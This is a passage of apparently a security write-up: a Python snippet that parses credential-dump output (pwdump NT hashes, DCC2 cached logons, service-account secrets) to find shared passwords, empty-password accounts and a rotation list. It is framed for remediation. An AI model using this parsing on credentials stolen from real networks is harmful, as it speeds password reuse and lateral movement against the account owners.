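EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
CME_PREFIX = re.compile(r"^SMB\s+\S+\s+\d+\s+\S+\s+")  # "SMB <ip> 445 <host> " added by cme
# pwdump line: [prefix\]user:rid:lmhash:nthash:::
PWDUMP = re.compile(r"^(?:[^\s:\\/]+\\)?([^\s:\\]+):(\d+):[0-9a-f]{32}:([0-9a-f]{32}):::$")
# cached domain logon: DOMAIN/user:$DCC2$<iterations>#user#hash
DCC2 = re.compile(r"^([\w.\-]+)/([\w$.\-]+):\$DCC2\$(\d+)#[\w$.\-]+#[0-9a-f]{32}$")
SC_HEADER = re.compile(r"^\[\*\] _SC_(\S+)$")           # service secret header ...
SC_CRED = re.compile(r"^([\w.\-]+)\\([\w$.\-]+):(.+)$")  # ... followed by domain\user:password


def parse_dump(text):
    """Split dump output into NT hashes, cached logons and service-account secrets."""
    nt_hashes, cached, services = {}, [], {}
    pending_service = None
    for raw in text.splitlines():
        line = CME_PREFIX.sub("", raw.strip())
        if pending_service:  # the line right after an _SC_ header carries the account
            if m := SC_CRED.match(line):
                services[pending_service] = f"{m.group(1)}\\{m.group(2)}"
                pending_service = None
                continue
            pending_service = None
        if m := SC_HEADER.match(line):
            pending_service = m.group(1)
        elif m := PWDUMP.match(line):
            nt_hashes[m.group(1)] = m.group(3)
        elif m := DCC2.match(line):
            cached.append((m.group(1), m.group(2), int(m.group(3))))
    return {"nt_hashes": nt_hashes, "cached": cached, "services": services}

def password_reuse(nt_hashes):
    """{nthash: sorted accounts} for every NT hash shared by more than one account."""
    by_hash = defaultdict(set)
    for account, nthash in nt_hashes.items():
        by_hash[nthash].add(account)
    return {h: sorted(a) for h, a in by_hash.items() if len(a) > 1}

def empty_password_accounts(nt_hashes):
    """Accounts whose NT hash is that of the empty password."""
    return sorted(a for a, h in nt_hashes.items() if h == EMPTY_NT)

def rotation_list(parsed):
    """Every identity whose secret was recovered: hash owners, cached logons, service accounts."""
    exposed = set(parsed["nt_hashes"])
    exposed.update(user for _, user, _ in parsed["cached"])
    exposed.update(acct.split("\\")[-1] for acct in parsed["services"].values())
    return sorted(exposed, key=str.lower)
```

Feeding it the real output from a dump shows at a glance which accounts share a password and which service accounts need their secret changed on every host where it was stored.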